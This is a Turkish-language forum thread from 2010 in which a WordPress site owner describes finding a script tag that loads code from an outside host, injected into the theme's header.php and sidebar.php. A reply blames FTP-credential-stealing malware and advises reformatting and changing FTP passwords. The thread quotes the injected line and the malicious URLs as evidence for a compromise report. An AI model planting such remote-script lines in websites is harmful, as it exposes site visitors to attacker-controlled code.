• 16-06-2010, 02:09:24
    #1
    merhabalar, ikitane kurumsal wordpress temamda durup dururken sitelerin bazı kısımları gözükmüyordu, sorunun temalardan kaynaklandığını düşündüm ve eski yedek dosyalarımı yükledim. sorunlar düzelmişti. bugün tekrar baktığımda, sitem acılırken yine eksik bir şekilde açıldı ve açılırkende durum cubuğuna bakıyorken birden
    http://www.iyikivarsin.org/lite/exec.php
    adlı bir sayfadan veri aldığını gördüm, hemen görünüm kaynak yapıp iyikivarsin.org adlı arama yaptım hiç bir sonuca ulaşamadım, temamdaki tüm dosyaların içine girip baktığımda ise
    <script src="http://qawsed.fileave.com/fesf.txt"></script>
    böyle bir kodu gördüm ve ne olduğuna bakıyım dedim, içinde tuaf şeyler yazıyordu hemen bunu silince normal bir şekilde sitelerim açılmaya başladı.

    daha sonra temaların tüm dosyalarını açıp bu kodu aradım, wordpresste header.php ve sidebar.php dosyalarında gördüm bu kodu
     <script src="http://qawsed.fileave.com/fesf.txt"></script>
    gördüm
    Bununla ilgili olarak bugün cumhuriyet başsavcılığında iyikivarsin.org hakkında suç duyurusunda bulundum.

    bakalım neler olacak sabırsızlıkla bekliyorum.

    bilmek istediğim diğer konu ise, böyle kodu sitemize nasıl ekleyebiliyorlar? bunun takibini nasıl yapabilirim?
  • 20-06-2010, 15:22:16
    #2
    Üyeliği durduruldu
    bilgisayarınıza bilindik virus bulaşmış fakat bunu yapan büyük ihtimalle türk
    bilgisayarınza format atıp ftp bilgilerini değiştirin.
    bilindik iframe virüsünün bir çeşitidi bunlarda.
    ftp ye dosya upload ederken bilgisayarınızdaki virüs de bu kodları ekliyor.
    en ağrısız çare formattır.